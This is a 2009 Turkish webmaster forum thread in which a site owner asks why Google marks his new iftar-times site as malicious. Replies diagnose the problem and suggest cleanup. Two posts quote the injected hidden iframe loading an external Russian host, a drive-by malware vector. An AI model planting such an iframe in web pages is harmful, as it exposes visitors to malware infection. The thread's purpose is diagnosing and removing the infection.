• 05-08-2009, 10:42:05
    #1
    iftar saatleri - Google'da Ara

    İftarsaatleri.TK daha açalı 1-2 hafta oldu zararlı site konumunda gözüküyor

    neden böyle olmuştur ki?
  • 05-08-2009, 10:50:51
    #2
    iftarsaatleri.tk için Google Güvenli Tarama tanı sayfası

    <iframe src="http://xb8.ru:8080/ts/in.cgi?pepsi122" width=125 height=125 style="visibility: hidden"></iframe>


    sanırım iframe virüsü bulaşmış temizleyin sitenizi tekrar değerleme isteyin düzene girecektir. geçmiş olsun
  • 05-08-2009, 10:52:33
    #3
    Platin üye
    kurduğun temada dışarı çıkış linki varsa, hosta yanlışlıkla zararlı bir sey girdiyse olabilir.
    zararlı site olma nedeni ne olarak gözüküyor.
    Siteniz dışarıya link vermiş, yada bu sitenin bir özelliği kullanmışsınız. Temayı değiştirip bu temayı silin. Tabi joomla veya wp ise. değilse kurduğunuz portalın link çıkışlarını araştırın.



    Kötü amaçlı yazılım xb8.ru/ alan adları da dahil 1 alanda barındırılıyor.

    This site was hosted on 1 network(s) including AS29550 (EUROCONNEX).

    Bu site, kötü amaçlı yazılımın dağıtılmasına aracılık yapmaya devam ediyor mu?
    Geçtiğimiz 90 gün içinde, iftarsaatleri.tk sitesinin sues.edu.cn/ alan adları da dahil 1 siteye kötü amaçlı yazılım bulaşmasına aracılık ettiği saptanmamıştır.

    Bu sitede kötü amaçlı yazılım barındırılıyor mu?
    Evet, bu site 90 günü aşkın bir süredir kötü amaçlı yazılım barındırmaktadır. sues.edu.cn/ alan adları da dahil 1 alanı etkilemiştir.

    Bu nasıl oldu?
    Bazı durumlarda üçüncü taraflar yasal sitelere kötü amaçlı kod ekleyebilir, bu da bizim uyarı mesajı göstermemize yol açar.
  • 05-08-2009, 11:55:27
    #4
    <iframe src="http://xb8.ru:8080/ts/in.cgi?pepsi122" width=125 height=125 style="visibility: hidden"></iframe>

    Bu iframeyi daha geçen sildim nasıl oluyorda geri geliyor
  • 05-08-2009, 12:34:14
    #5
    Kimlik doğrulama veya yönetimden onay bekliyor.
    avast kurun bilgisayarınıza...
  • 05-08-2009, 12:41:25
    #6
    rapley adlı üyeden alıntı: mesajı görüntüle
    avast kurun bilgisayarınıza...
    Avast vardı https://www.r10.net/r10-bilgi-arsivi/...post1057832081 bu konuda Kasprersky var diye sildim kaspersky kurdum
    Ramazan için açmıştım siteyi site şimdi ne halde

    Aradım taradım , Virüs programlarına Tarattım hiçbir virüse raslanmadı